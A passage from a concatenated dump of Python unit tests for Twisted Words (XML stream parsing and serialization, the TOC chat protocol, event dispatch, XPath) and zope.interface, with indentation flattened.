def setUp(self):
self.doc_started = False
self.doc_ended = False
self.root = None
self.elements = []
self.stream = self.streamClass()
self.stream.DocumentStartEvent = self._docStarted
self.stream.ElementEvent = self.elements.append
self.stream.DocumentEndEvent = self._docEnded
def _docStarted(self, root):
self.root = root
self.doc_started = True
def _docEnded(self):
self.doc_ended = True
def doTest(self, xml):
self.stream.parse(xml)
def testHarness(self):
xml = "<root><child/><child2/></root>"
self.stream.parse(xml)
self.assertEquals(self.doc_started, True)
self.assertEquals(self.root.name, 'root')
self.assertEquals(self.elements[0].name, 'child')
self.assertEquals(self.elements[1].name, 'child2')
self.assertEquals(self.doc_ended, True)
def testBasic(self):
xml = "<stream:stream xmlns:stream='etherx' xmlns='jabber'>\n" + \
" <message to='bar'>" + \
" <x xmlns='xdelay'>some&data></x>" + \
" </message>" + \
"</stream:stream>"
self.stream.parse(xml)
self.assertEquals(self.root.name, 'stream')
self.assertEquals(self.root.uri, 'etherx')
self.assertEquals(self.elements[0].name, 'message')
self.assertEquals(self.elements[0].uri, 'jabber')
self.assertEquals(self.elements[0]['to'], 'bar')
self.assertEquals(self.elements[0].x.uri, 'xdelay')
self.assertEquals(unicode(self.elements[0].x), 'some&data>')
def testNoRootNS(self):
xml = "<stream><error xmlns='etherx'/></stream>"
self.stream.parse(xml)
self.assertEquals(self.root.uri, '')
self.assertEquals(self.elements[0].uri, 'etherx')
def testNoDefaultNS(self):
xml = "<stream:stream xmlns:stream='etherx'><error/></stream:stream>"""
self.stream.parse(xml)
self.assertEquals(self.root.uri, 'etherx')
self.assertEquals(self.root.defaultUri, '')
self.assertEquals(self.elements[0].uri, '')
self.assertEquals(self.elements[0].defaultUri, '')
def testChildDefaultNS(self):
xml = "<root xmlns='testns'><child/></root>"
self.stream.parse(xml)
self.assertEquals(self.root.uri, 'testns')
self.assertEquals(self.elements[0].uri, 'testns')
def testEmptyChildNS(self):
xml = "<root xmlns='testns'><child1><child2 xmlns=''/></child1></root>"
self.stream.parse(xml)
self.assertEquals(self.elements[0].child2.uri, '')
def testChildPrefix(self):
xml = "<root xmlns='testns' xmlns:foo='testns2'><foo:child/></root>"
self.stream.parse(xml)
self.assertEquals(self.root.localPrefixes['foo'], 'testns2')
self.assertEquals(self.elements[0].uri, 'testns2')
def testUnclosedElement(self):
self.assertRaises(domish.ParserError, self.stream.parse,
"<root><error></root>")
class DomishExpatStreamTestCase(unittest.TestCase, DomishStreamTests):
def setUp(self):
DomishStreamTests.setUp(self)
def setUpClass(self):
try:
import pyexpat
except ImportError:
raise unittest.SkipTest, "Skipping ExpatElementStream test, since no expat wrapper is available."
self.streamClass = domish.ExpatElementStream
class DomishSuxStreamTestCase(unittest.TestCase, DomishStreamTests):
def setUp(self):
DomishStreamTests.setUp(self)
def setUpClass(self):
if domish.SuxElementStream is None:
raise unittest.SkipTest, "Skipping SuxElementStream test, since twisted.web is not available."
self.streamClass = domish.SuxElementStream
class SerializerTests:
def testNoNamespace(self):
e = domish.Element((None, "foo"))
self.assertEquals(e.toXml(), "<foo/>")
self.assertEquals(e.toXml(closeElement = 0), "<foo>")
def testDefaultNamespace(self):
e = domish.Element(("testns", "foo"))
self.assertEquals(e.toXml(), "<foo xmlns='testns'/>")
def testOtherNamespace(self):
e = domish.Element(("testns", "foo"), "testns2")
self.assertEquals(e.toXml({'testns': 'bar'}),
"<bar:foo xmlns:bar='testns' xmlns='testns2'/>")
def testChildDefaultNamespace(self):
e = domish.Element(("testns", "foo"))
e.addElement("bar")
self.assertEquals(e.toXml(), "<foo xmlns='testns'><bar/></foo>")
def testChildSameNamespace(self):
e = domish.Element(("testns", "foo"))
e.addElement(("testns", "bar"))
self.assertEquals(e.toXml(), "<foo xmlns='testns'><bar/></foo>")
def testChildSameDefaultNamespace(self):
e = domish.Element(("testns", "foo"))
e.addElement("bar", "testns")
self.assertEquals(e.toXml(), "<foo xmlns='testns'><bar/></foo>")
def testChildOtherDefaultNamespace(self):
e = domish.Element(("testns", "foo"))
e.addElement(("testns2", "bar"), 'testns2')
self.assertEquals(e.toXml(), "<foo xmlns='testns'><bar xmlns='testns2'/></foo>")
def testOnlyChildDefaultNamespace(self):
e = domish.Element((None, "foo"))
e.addElement(("ns2", "bar"), 'ns2')
self.assertEquals(e.toXml(), "<foo><bar xmlns='ns2'/></foo>")
def testOnlyChildDefaultNamespace2(self):
e = domish.Element((None, "foo"))
e.addElement("bar")
self.assertEquals(e.toXml(), "<foo><bar/></foo>")
def testChildInDefaultNamespace(self):
e = domish.Element(("testns", "foo"), "testns2")
e.addElement(("testns2", "bar"))
self.assertEquals(e.toXml(), "<xn0:foo xmlns:xn0='testns' xmlns='testns2'><bar/></xn0:foo>")
def testQualifiedAttribute(self):
e = domish.Element((None, "foo"),
attribs = {("testns2", "bar"): "baz"})
self.assertEquals(e.toXml(), "<foo xmlns:xn0='testns2' xn0:bar='baz'/>")
def testQualifiedAttributeDefaultNS(self):
e = domish.Element(("testns", "foo"),
attribs = {("testns", "bar"): "baz"})
self.assertEquals(e.toXml(), "<foo xmlns='testns' xmlns:xn0='testns' xn0:bar='baz'/>")
def testTwoChilds(self):
e = domish.Element(('', "foo"))
child1 = e.addElement(("testns", "bar"), "testns2")
child1.addElement(('testns2', 'quux'))
child2 = e.addElement(("testns3", "baz"), "testns4")
child2.addElement(('testns', 'quux'))
self.assertEquals(e.toXml(), "<foo><xn0:bar xmlns:xn0='testns' xmlns='testns2'><quux/></xn0:bar><xn1:baz xmlns:xn1='testns3' xmlns='testns4'><xn0:quux xmlns:xn0='testns'/></xn1:baz></foo>")
def testXMLNamespace(self):
e = domish.Element((None, "foo"),
attribs = {("http://www.w3.org/XML/1998/namespace",
"lang"): "en_US"})
self.assertEquals(e.toXml(), "<foo xml:lang='en_US'/>")
def testQualifiedAttributeGivenListOfPrefixes(self):
e = domish.Element((None, "foo"),
attribs = {("testns2", "bar"): "baz"})
self.assertEquals(e.toXml({"testns2": "qux"}),
"<foo xmlns:qux='testns2' qux:bar='baz'/>")
def testNSPrefix(self):
e = domish.Element((None, "foo"),
attribs = {("testns2", "bar"): "baz"})
c = e.addElement(("testns2", "qux"))
c[("testns2", "bar")] = "quux"
self.assertEquals(e.toXml(), "<foo xmlns:xn0='testns2' xn0:bar='baz'><xn0:qux xn0:bar='quux'/></foo>")
def testDefaultNSPrefix(self):
e = domish.Element((None, "foo"),
attribs = {("testns2", "bar"): "baz"})
c = e.addElement(("testns2", "qux"))
c[("testns2", "bar")] = "quux"
c.addElement('foo')
self.assertEquals(e.toXml(), "<foo xmlns:xn0='testns2' xn0:bar='baz'><xn0:qux xn0:bar='quux'><xn0:foo/></xn0:qux></foo>")
def testPrefixScope(self):
e = domish.Element(('testns', 'foo'))
self.assertEquals(e.toXml(prefixes={'testns': 'bar'},
prefixesInScope=['bar']),
"<bar:foo/>")
def testLocalPrefixes(self):
e = domish.Element(('testns', 'foo'), localPrefixes={'bar': 'testns'})
self.assertEquals(e.toXml(), "<bar:foo xmlns:bar='testns'/>")
def testLocalPrefixesWithChild(self):
e = domish.Element(('testns', 'foo'), localPrefixes={'bar': 'testns'})
e.addElement('baz')
self.assertIdentical(e.baz.defaultUri, None)
self.assertEquals(e.toXml(), "<bar:foo xmlns:bar='testns'><baz/></bar:foo>")
def testRawXMLSerialization(self):
e = domish.Element((None, "foo"))
e.addRawXml("<abc123>")
# The testcase below should NOT generate valid XML -- that's
        # the whole point of using the raw XML call -- it's the caller's
        # responsibility to ensure that the data inserted is valid
self.assertEquals(e.toXml(), "<foo><abc123></foo>")
def testRawXMLWithUnicodeSerialization(self):
e = domish.Element((None, "foo"))
e.addRawXml(u"<degree>\u00B0</degree>")
self.assertEquals(e.toXml(), u"<foo><degree>\u00B0</degree></foo>")
def testUnicodeSerialization(self):
e = domish.Element((None, "foo"))
e["test"] = u"my value\u0221e"
e.addContent(u"A degree symbol...\u00B0")
self.assertEquals(e.toXml(),
u"<foo test='my value\u0221e'>A degree symbol...\u00B0</foo>")
class DomishTestListSerializer(unittest.TestCase, SerializerTests):
def setUpClass(self):
self.__serializerClass = domish.SerializerClass
domish.SerializerClass = domish._ListSerializer
def tearDownClass(self):
domish.SerializerClass = self.__serializerClass
```
#### File: words/test/test_toc.py
```python
from twisted.trial import unittest
from twisted.words.protocols import toc
from twisted.internet import protocol, main
from twisted.python import failure
import StringIO
from struct import pack,unpack
class StringIOWithoutClosing(StringIO.StringIO):
def close(self):
pass
class DummyTOC(toc.TOC):
"""
    Used to override authentication; now overrides printing.
"""
def _debug(self,data):
pass
SEQID=1001
def flap(type,data):
global SEQID
send="*"
send=send+pack("!BHH",type,SEQID,len(data))
send=send+data
SEQID=SEQID+1
return send
def readFlap(data):
if data=="": return [None,""]
null,type,seqid,length=unpack("!BBHH",data[:6])
val=data[6:6+length]
return [[type,val],data[6+length:]]
class TOCGeneralTestCase(unittest.TestCase):
"""
general testing of TOC functions.
"""
def testTOC(self):
self.runTest()
def runTest(self):
USERS=2
data=range(USERS)
data[0]=("FLAPON\r\n\r\n",\
flap(1,"\000\000\000\001\000\001\000\004test"),\
flap(2,"toc_signon localhost 9999 test 0x100000 english \"penguin 0.1\"\000"),\
flap(2,"toc_add_buddy test\000"),\
flap(2,"toc_init_done\000"),\
flap(2,"toc_send_im test \"hi\"\000"),\
flap(2,"toc_send_im test2 \"hello\"\000"),\
flap(2,"toc_set_away \"not here\"\000"),\
flap(2,"toc_set_idle 602\000"),\
flap(2,"toc_set_idle 0\000"),\
flap(2,"toc_set_away\000"),\
flap(2,"toc_evil test norm\000"),\
flap(2,"toc_chat_join 4 \"Test Chat\"\000"),\
flap(2,"toc_chat_send 0 \"hello\"\000"),\
#flap(2,"toc_chat_leave 0\000")) #,\
flap(2,"toc_chat_invite 0 \"come\" ooga\000"),\
#flap(2,"toc_chat_accept 0\000"),\
flap(5,"\000"),\
flap(2,"toc_chat_whisper 0 ooga \"boo ga\"\000"),\
flap(2,"toc_chat_leave 0"),\
flap(5,"\000"))
data[1]=("FLAPON\r\n\r\n",\
flap(1,"\000\000\000\001\000\001\000\004ooga"),\
flap(2,"toc_signon localhost 9999 ooga 0x100000 english \"penguin 0.1\"\000"),\
flap(2,"toc_add_buddy test\000"),\
flap(2,"toc_init_done\000"),\
flap(5,"\000"),\
flap(5,"\000"),\
#flap(5,"\000"),\
#flap(5,"\000"),\
#flap(5,"\000"),\
flap(5,"\000"),\
flap(5,"\000"),\
flap(5,"\000"),\
flap(5,"\000"),\
flap(5,"\000"),\
flap(5,"\000"),\
flap(5,"\000"),\
#flap(5,"\000"),\
flap(2,"toc_chat_accept 0\000"),\
flap(2,"toc_chat_send 0 \"hi test\"\000"),\
flap(5,"\000"),\
flap(2,"toc_chat_leave 0\000"))
strings=range(USERS)
for i in strings:
strings[i]=StringIOWithoutClosing()
fac=toc.TOCFactory()
dummy=range(USERS)
for i in dummy:
dummy[i]=DummyTOC()
dummy[i].factory=fac
dummy[i].makeConnection(protocol.FileWrapper(strings[i]))
while reduce(lambda x,y:x+y,map(lambda x:x==(),data))!=USERS:
for i in range(USERS):
d=data[i]
if len(d)>0:
k,data[i]=d[0],d[1:]
for j in k:
dummy[i].dataReceived(j) # test by doing a character at a time
else:
dummy[i].connectionLost(failure.Failure(main.CONNECTION_DONE))
values=range(USERS)
for i in values:
values[i]=strings[i].getvalue()
flaps=map(lambda x:[],range(USERS))
for value in values:
i=values.index(value)
f,value=readFlap(value)
while f:
flaps[i].append(f)
f,value=readFlap(value)
ts=range(USERS)
for t in ts:
ts[t]=dummy[t].signontime
shouldequal=range(USERS)
shouldequal[0]=[ \
[1,"\000\000\000\001"],\
[2,"SIGN_ON:TOC1.0\000"],\
[2,"NICK:test\000"],\
[2,"CONFIG:\00"],\
[2,"UPDATE_BUDDY:test:T:0:%s:0: O\000"%ts[0]],\
[2,"IM_IN:test:F:hi\000"],\
[2,"ERROR:901:test2\000"],\
#[2,"UPDATE_BUDDY:test:T:0:%s:0: O\000"%ts[0]],\
[2,"UPDATE_BUDDY:test:T:0:%s:0: OU\000"%ts[0]],\
[2,"UPDATE_BUDDY:test:T:0:%s:10: OU\000"%ts[0]],\
[2,"UPDATE_BUDDY:test:T:0:%s:0: OU\000"%ts[0]],\
[2,"UPDATE_BUDDY:test:T:0:%s:0: O\000"%ts[0]],\
[2,"EVILED:10:test\000"],\
[2,"UPDATE_BUDDY:test:T:10:%s:0: O\000"%ts[0]],\
[2,"CHAT_JOIN:0:Test Chat\000"],\
[2,"CHAT_UPDATE_BUDDY:0:T:test\000"],\
[2,"CHAT_IN:0:test:F:hello\000"],\
[2,"CHAT_UPDATE_BUDDY:0:T:ooga\000"],\
[2,"CHAT_IN:0:ooga:F:hi test\000"],\
[2,"CHAT_LEFT:0\000"]]
shouldequal[1]=[ \
[1,"\000\000\000\001"],\
[2,"SIGN_ON:TOC1.0\000"],\
[2,"NICK:ooga\000"],\
[2,"CONFIG:\000"],\
#[2,"UPDATE_BUDDY:test:T:0:%s:0: O\000"%ts[0]],\
[2,"UPDATE_BUDDY:test:T:0:%s:0: OU\000"%ts[0]],\
[2,"UPDATE_BUDDY:test:T:0:%s:10: OU\000"%ts[0]],\
[2,"UPDATE_BUDDY:test:T:0:%s:0: OU\000"%ts[0]],\
[2,"UPDATE_BUDDY:test:T:0:%s:0: O\000"%ts[0]],\
[2,"UPDATE_BUDDY:test:T:10:%s:0: O\000"%ts[0]],\
[2,"CHAT_INVITE:Test Chat:0:test:come\000"],\
[2,"CHAT_JOIN:0:Test Chat\000"],\
[2,"CHAT_UPDATE_BUDDY:0:T:test:ooga\000"],\
[2,"CHAT_IN:0:ooga:F:hi test\000"],\
[2,"CHAT_IN:0:test:T:boo ga\000"],\
[2,"CHAT_UPDATE_BUDDY:0:F:test\000"],\
[2,"CHAT_LEFT:0\000"]]
if flaps!=shouldequal:
for i in range(len(shouldequal)):
for j in range(len(shouldequal[i])):
if shouldequal[i][j]!=flaps[i][j]:
raise AssertionError("GeneralTest Failed!\nUser %s Line %s\nactual:%s\nshould be:%s"%(i,j,flaps[i][j],shouldequal[i][j]))
raise AssertionError("GeneralTest Failed with incorrect lengths!")
class TOCMultiPacketTestCase(unittest.TestCase):
"""
    I saw this problem when using GAIM. It only read the flaps once per dataReceived, and would basically block if it ever received two packets together in one dataReceived. This tests for that occurrence.
"""
def testTOC(self):
self.runTest()
def runTest(self):
packets=["FLAPON\r\n\r\n",\
flap(1,"\000\000\000\001\000\001\000\004test"),\
flap(2,"toc_signon null 9999 test 0x100000 english \"penguin 0.1\"\000"),\
flap(2,"toc_init_done\000"),\
flap(2,"toc_send_im test hi\000")]
shouldbe=[[1,"\000\000\000\001"],\
[2,"SIGN_ON:TOC1.0\000"],\
[2,"NICK:test\000"],\
[2,"CONFIG:\000"],\
[2,"IM_IN:test:F:hi\000"]]
data=""
for i in packets:
data=data+i
s=StringIOWithoutClosing()
d=DummyTOC()
fac=toc.TOCFactory()
d.factory=fac
d.makeConnection(protocol.FileWrapper(s))
d.dataReceived(data)
d.connectionLost(failure.Failure(main.CONNECTION_DONE))
value=s.getvalue()
flaps=[]
f,value=readFlap(value)
while f:
flaps.append(f)
f,value=readFlap(value)
if flaps!=shouldbe:
for i in range(len(flaps)):
if flaps[i]!=shouldbe[i]:raise AssertionError("MultiPacketTest Failed!\nactual:%s\nshould be:%s"%(flaps[i],shouldbe[i]))
raise AssertionError("MultiPacketTest Failed with incorrect length!, printing both lists\nactual:%s\nshould be:%s"%(flaps,shouldbe))
class TOCSavedValuesTestCase(unittest.TestCase):
def testTOC(self):
self.runTest()
def runTest(self):
password1=toc.roast("test pass")
password2=toc.roast("<PASSWORD>")
beforesend=[\
"FLAPON\r\n\r\n",\
flap(1,"\000\000\000\001\000\001\000\004test"),\
flap(2,"toc_signon localhost 9999 test %s english \"penguin 0.1\"\000"%password1),\
flap(2,"toc_init_done\000"),\
flap(2,"toc_set_config \"{m 4}\"\000"),\
flap(2,"toc_format_nickname BOOGA\000"),\
flap(2,"toc_format_nickname \"T E S T\"\000"),\
flap(2,"toc_change_passwd \"testpass\" \"pass test\"\000"),\
flap(2,"toc_change_passwd \"test pass\" \"pass test\"\000")]
beforeexpect=[\
[1,"\000\000\000\001"],\
[2,"SIGN_ON:TOC1.0\000"],\
[2,"NICK:test\000"],\
[2,"CONFIG:\000"],\
[2,"ERROR:911\000"],\
[2,"ADMIN_NICK_STATUS:0\000"],\
[2,"ERROR:911\000"],\
[2,"ADMIN_PASSWD_STATUS:0\000"]]
badpasssend=[\
"FLAPON\r\n\r\n",\
flap(1,"\000\000\000\001\000\001\000\004test"),\
flap(2,"toc_signon localhost 9999 test 0x1000 english \"penguin 0.1\"\000"),\
flap(2,"toc_init_done")]
badpassexpect=[\
[1,"\000\00\000\001"],\
[2,"ERROR:980\000"]]
goodpasssend=[\
"FLAPON\r\n\r\n",\
flap(1,"\000\000\000\001\000\001\000\004test"),\
flap(2,"toc_signon localhost 9999 test %s english \"penguin 0.1\"\000"%password2),\
flap(2,"toc_init_done")]
goodpassexpect=[\
[1,"\000\000\000\001"],\
[2,"SIGN_ON:TOC1.0\000"],\
[2,"NICK:T E S T\000"],\
[2,"CONFIG:{m 4}\000"]]
fac=toc.TOCFactory()
d=DummyTOC()
d.factory=fac
s=StringIOWithoutClosing()
d.makeConnection(protocol.FileWrapper(s))
for i in beforesend:
d.dataReceived(i)
d.connectionLost(failure.Failure(main.CONNECTION_DONE))
v=s.getvalue()
flaps=[]
f,v=readFlap(v)
while f:
flaps.append(f)
f,v=readFlap(v)
if flaps!=beforeexpect:
for i in range(len(flaps)):
if flaps[i]!=beforeexpect[i]:
raise AssertionError("SavedValuesTest Before Failed!\nactual:%s\nshould be:%s"%(flaps[i],beforeexpect[i]))
raise AssertionError("SavedValuesTest Before Failed with incorrect length!\nactual:%s\nshould be:%s"%(flaps,beforeexpect))
d=DummyTOC()
d.factory=fac
s=StringIOWithoutClosing()
d.makeConnection(protocol.FileWrapper(s))
for i in badpasssend:
d.dataReceived(i)
d.connectionLost(failure.Failure(main.CONNECTION_DONE))
v=s.getvalue()
flaps=[]
f,v=readFlap(v)
while f:
flaps.append(f)
f,v=readFlap(v)
if flaps!=badpassexpect:
for i in range(len(flaps)):
if flaps[i]!=badpassexpect[i]:
raise AssertionError("SavedValuesTest BadPass Failed!\nactual:%s\nshould be:%s"%(flaps[i],badpassexpect[i]))
raise AssertionError("SavedValuesTest BadPass Failed with incorrect length!\nactual:%s\nshould be:%s"%(flaps,badpassexpect))
d=DummyTOC()
d.factory=fac
s=StringIOWithoutClosing()
d.makeConnection(protocol.FileWrapper(s))
for i in goodpasssend:
d.dataReceived(i)
d.connectionLost(failure.Failure(main.CONNECTION_DONE))
v=s.getvalue()
flaps=[]
f,v=readFlap(v)
while f:
flaps.append(f)
f,v=readFlap(v)
if flaps!=goodpassexpect:
for i in range(len(flaps)):
if flaps[i]!=goodpassexpect[i]:
raise AssertionError("SavedValuesTest GoodPass Failed!\nactual:%s\nshould be:%s"%(flaps[i],goodpassexpect[i]))
raise AssertionError("SavedValuesTest GoodPass Failed with incorrect length!\nactual:%s\nshould be:%s"%(flaps,beforeexpect))
class TOCPrivacyTestCase(unittest.TestCase):
def runTest(self):
sends=["FLAPON\r\n\r\n",\
flap(1,"\000\000\000\001\000\001\000\004test"),\
flap(2,"toc_signon localhost 9999 test 0x00 english penguin\000"),\
flap(2,"toc_init_done\000"),\
flap(2,"toc_add_deny\000"),\
flap(2,"toc_send_im test 1\000"),\
flap(2,"toc_add_deny test\000"),\
flap(2,"toc_send_im test 2\000"),\
flap(2,"toc_add_permit\000"),\
flap(2,"toc_send_im test 3\000"),\
flap(2,"toc_add_permit test\000"),\
flap(2,"toc_send_im test 4\000")]
expect=[[1,"\000\000\000\001"],\
[2,"SIGN_ON:TOC1.0\000"],\
[2,"NICK:test\000"],\
[2,"CONFIG:\000"],\
[2,"IM_IN:test:F:1\000"],\
[2,"ERROR:901:test\000"],\
[2,"ERROR:901:test\000"],\
[2,"IM_IN:test:F:4\000"]]
d=DummyTOC()
d.factory=toc.TOCFactory()
s=StringIOWithoutClosing()
d.makeConnection(protocol.FileWrapper(s))
for i in sends:
d.dataReceived(i)
d.connectionLost(failure.Failure(main.CONNECTION_DONE))
v=s.getvalue()
flaps=[]
f,v=readFlap(v)
while f:
flaps.append(f)
f,v=readFlap(v)
if flaps!=expect:
for i in range(len(flaps)):
if flaps[i]!=expect[i]:
raise AssertionError("PrivacyTest Before Failed!\nactual:%s\nshould be:%s"%(flaps[i],expect[i]))
raise AssertionError("PrivacyTest Before Failed with incorrect length!\nactual:%s\nshould be:%s"%(flaps,expect))
testCases=[TOCGeneralTestCase,TOCMultiPacketTestCase,TOCSavedValuesTestCase,TOCPrivacyTestCase]
```
#### File: words/test/test_xishutil.py
```python
import sys, os
from twisted.trial import unittest
from twisted.words.xish.domish import Element
from twisted.words.xish.utility import EventDispatcher
class CallbackTracker:
def __init__(self):
self.called = 0
self.object = None
def call(self, object):
self.called = self.called + 1
self.object = object
class CallbackTracker2 (CallbackTracker):
def __init__(self, dispatcher):
CallbackTracker.__init__(self)
self.dispatcher = dispatcher
def call2(self, _):
self.dispatcher.addObserver("/presence", self.call)
class OrderedCallbackTracker:
def __init__(self):
self.callList = []
def call1(self, object):
self.callList.append(self.call1)
def call2(self, object):
self.callList.append(self.call2)
def call3(self, object):
self.callList.append(self.call3)
class EventDispatcherTest(unittest.TestCase):
def testStuff(self):
d = EventDispatcher()
cb1 = CallbackTracker()
cb2 = CallbackTracker()
cb3 = CallbackTracker()
d.addObserver("/message/body", cb1.call)
d.addObserver("/message", cb1.call)
d.addObserver("/presence", cb2.call)
d.addObserver("//event/testevent", cb3.call)
msg = Element(("ns", "message"))
msg.addElement("body")
pres = Element(("ns", "presence"))
pres.addElement("presence")
d.dispatch(msg)
self.assertEquals(cb1.called, 2)
self.assertEquals(cb1.object, msg)
self.assertEquals(cb2.called, 0)
d.dispatch(pres)
self.assertEquals(cb1.called, 2)
self.assertEquals(cb2.called, 1)
self.assertEquals(cb2.object, pres)
self.assertEquals(cb3.called, 0)
d.dispatch(d, "//event/testevent")
self.assertEquals(cb3.called, 1)
self.assertEquals(cb3.object, d)
d.removeObserver("/presence", cb2.call)
d.dispatch(pres)
self.assertEquals(cb2.called, 1)
def testAddObserverInDispatch(self):
# Test for registration of events during dispatch
d = EventDispatcher()
msg = Element(("ns", "message"))
pres = Element(("ns", "presence"))
cb = CallbackTracker2(d)
d.addObserver("/message", cb.call2)
d.dispatch(msg)
self.assertEquals(cb.called, 0)
d.dispatch(pres)
self.assertEquals(cb.called, 1)
def testOnetimeDispatch(self):
d = EventDispatcher()
msg = Element(("ns", "message"))
cb = CallbackTracker()
d.addOnetimeObserver("/message", cb.call)
d.dispatch(msg)
self.assertEquals(cb.called, 1)
d.dispatch(msg)
self.assertEquals(cb.called, 1)
def testDispatcherResult(self):
d = EventDispatcher()
msg = Element(("ns", "message"))
pres = Element(("ns", "presence"))
cb = CallbackTracker()
d.addObserver("/presence", cb.call)
result = d.dispatch(msg)
self.assertEquals(False, result)
result = d.dispatch(pres)
self.assertEquals(True, result)
def testOrderedXPathDispatch(self):
d = EventDispatcher()
cb = OrderedCallbackTracker()
d.addObserver("/message/body", cb.call2)
d.addObserver("/message", cb.call3, -1)
d.addObserver("/message/body", cb.call1, 1)
msg = Element(("ns", "message"))
msg.addElement("body")
d.dispatch(msg)
self.assertEquals(cb.callList, [cb.call1, cb.call2, cb.call3],
"Calls out of order: %s" %
repr([c.__name__ for c in cb.callList]))
```
#### File: words/test/test_xmlstream.py
```python
from twisted.trial import unittest
from twisted.words.xish import xmlstream
class XmlStreamTest(unittest.TestCase):
def setUp(self):
self.errorOccurred = False
self.streamStarted = False
self.streamEnded = False
self.outlist = []
self.xmlstream = xmlstream.XmlStream()
self.xmlstream.transport = self
self.xmlstream.transport.write = self.outlist.append
    # Auxiliary methods
def loseConnection(self):
self.xmlstream.connectionLost("no reason")
def streamStartEvent(self, rootelem):
self.streamStarted = True
def streamErrorEvent(self, errelem):
self.errorOccurred = True
def streamEndEvent(self, _):
self.streamEnded = True
def testBasicOp(self):
xs = self.xmlstream
xs.addObserver(xmlstream.STREAM_START_EVENT,
self.streamStartEvent)
xs.addObserver(xmlstream.STREAM_ERROR_EVENT,
self.streamErrorEvent)
xs.addObserver(xmlstream.STREAM_END_EVENT,
self.streamEndEvent)
# Go...
xs.connectionMade()
xs.send("<root>")
self.assertEquals(self.outlist[0], "<root>")
xs.dataReceived("<root>")
self.assertEquals(self.streamStarted, True)
self.assertEquals(self.errorOccurred, False)
self.assertEquals(self.streamEnded, False)
xs.dataReceived("<child><unclosed></child>")
self.assertEquals(self.errorOccurred, True)
self.assertEquals(self.streamEnded, True)
```
#### File: words/test/test_xpath.py
```python
from twisted.trial import unittest
import sys, os
from twisted.words.xish.domish import Element
from twisted.words.xish.xpath import XPathQuery
from twisted.words.xish import xpath
class XPathTest(unittest.TestCase):
def setUp(self):
# Build element:
# <foo xmlns='testns' attrib1='value1' attrib3="user@host/resource">
# somecontent
# <bar>
# <foo>
# <gar>DEF</gar>
# </foo>
# </bar>
# somemorecontent
# <bar attrib2="value2">
# <bar>
# <foo/>
# <gar>ABC</gar>
# </bar>
# <bar/>
# </foo>
self.e = Element(("testns", "foo"))
self.e["attrib1"] = "value1"
self.e["attrib3"] = "user@host/resource"
self.e.addContent("somecontent")
self.bar1 = self.e.addElement("bar")
self.subfoo = self.bar1.addElement("foo")
self.gar1 = self.subfoo.addElement("gar")
self.gar1.addContent("DEF")
self.e.addContent("somemorecontent")
self.bar2 = self.e.addElement("bar")
self.bar2["attrib2"] = "value2"
self.bar3 = self.bar2.addElement("bar")
self.subfoo2 = self.bar3.addElement("foo")
self.gar2 = self.bar3.addElement("gar")
self.gar2.addContent("ABC")
self.bar4 = self.e.addElement("bar")
def testStaticMethods(self):
self.assertEquals(xpath.matches("/foo/bar", self.e),
True)
self.assertEquals(xpath.queryForNodes("/foo/bar", self.e),
[self.bar1, self.bar2, self.bar4])
self.assertEquals(xpath.queryForString("/foo", self.e),
"somecontent")
self.assertEquals(xpath.queryForStringList("/foo", self.e),
["somecontent", "somemorecontent"])
def testFunctionality(self):
xp = XPathQuery("/foo/bar")
self.assertEquals(xp.matches(self.e), 1)
xp = XPathQuery("/foo/bar/foo")
self.assertEquals(xp.matches(self.e), 1)
self.assertEquals(xp.queryForNodes(self.e), [self.subfoo])
xp = XPathQuery("/foo/bar3")
self.assertEquals(xp.matches(self.e), 0)
xp = XPathQuery("/foo/*")
self.assertEquals(xp.matches(self.e), True)
self.assertEquals(xp.queryForNodes(self.e), [self.bar1, self.bar2, self.bar4])
xp = XPathQuery("/foo[@attrib1]")
self.assertEquals(xp.matches(self.e), True)
xp = XPathQuery("/foo/*[@attrib2='value2']")
self.assertEquals(xp.matches(self.e), True)
self.assertEquals(xp.queryForNodes(self.e), [self.bar2])
        # XXX: Revisit this, given new grammar
# xp = XPathQuery("/foo/bar[2]")
# self.assertEquals(xp.matches(self.e), 1)
# self.assertEquals(xp.queryForNodes(self.e), [self.bar1])
xp = XPathQuery("/foo[@xmlns='testns']/bar")
self.assertEquals(xp.matches(self.e), 1)
xp = XPathQuery("/foo[@xmlns='badns']/bar2")
self.assertEquals(xp.matches(self.e), 0)
xp = XPathQuery("/foo[@attrib1='value1']")
self.assertEquals(xp.matches(self.e), 1)
xp = XPathQuery("/foo")
self.assertEquals(xp.queryForString(self.e), "somecontent")
self.assertEquals(xp.queryForStringList(self.e), ["somecontent", "somemorecontent"])
xp = XPathQuery("/foo/bar")
self.assertEquals(xp.queryForNodes(self.e), [self.bar1, self.bar2, self.bar4])
xp = XPathQuery("/foo[text() = 'somecontent']")
self.assertEquals(xp.matches(self.e), True)
xp = XPathQuery("/foo[not(@nosuchattrib)]")
self.assertEquals(xp.matches(self.e), True)
xp = XPathQuery("//gar")
self.assertEquals(xp.matches(self.e), True)
self.assertEquals(xp.queryForNodes(self.e), [self.gar1, self.gar2])
self.assertEquals(xp.queryForStringList(self.e), ["DEF", "ABC"])
xp = XPathQuery("//bar")
self.assertEquals(xp.matches(self.e), True)
self.assertEquals(xp.queryForNodes(self.e), [self.bar1, self.bar2, self.bar3, self.bar4])
```
#### File: interface/tests/test_element.py
```python
import unittest
from zope.interface.interface import Element
class TestElement(unittest.TestCase):
def test_taggedValues(self):
"""Test that we can update tagged values of more than one element
"""
e1 = Element("foo")
e2 = Element("bar")
e1.setTaggedValue("x", 1)
e2.setTaggedValue("x", 2)
self.assertEqual(e1.getTaggedValue("x"), 1)
self.assertEqual(e2.getTaggedValue("x"), 2)
def test_suite():
suite = unittest.TestSuite()
suite.addTest(unittest.makeSuite(TestElement))
return suite
if __name__ == '__main__':
unittest.main(defaultTest='test_suite')
```
#### File: interface/tests/test_verify.py
```python
from zope.interface import Interface, implements, classImplements, Attribute
from zope.interface.verify import verifyClass, verifyObject
from zope.interface.exceptions import DoesNotImplement, BrokenImplementation
from zope.interface.exceptions import BrokenMethodImplementation
import unittest
class Test(unittest.TestCase):
def testNotImplemented(self):
class C(object): pass
class I(Interface): pass
self.assertRaises(DoesNotImplement, verifyClass, I, C)
classImplements(C, I)
verifyClass(I, C)
def testMissingAttr(self):
class I(Interface):
def f(): pass
class C(object):
implements(I)
self.assertRaises(BrokenImplementation, verifyClass, I, C)
C.f=lambda self: None
verifyClass(I, C)
def testMissingAttr_with_Extended_Interface(self):
class II(Interface):
def f():
pass
class I(II):
pass
class C(object):
implements(I)
self.assertRaises(BrokenImplementation, verifyClass, I, C)
C.f=lambda self: None
verifyClass(I, C)
def testWrongArgs(self):
class I(Interface):
def f(a): pass
class C(object):
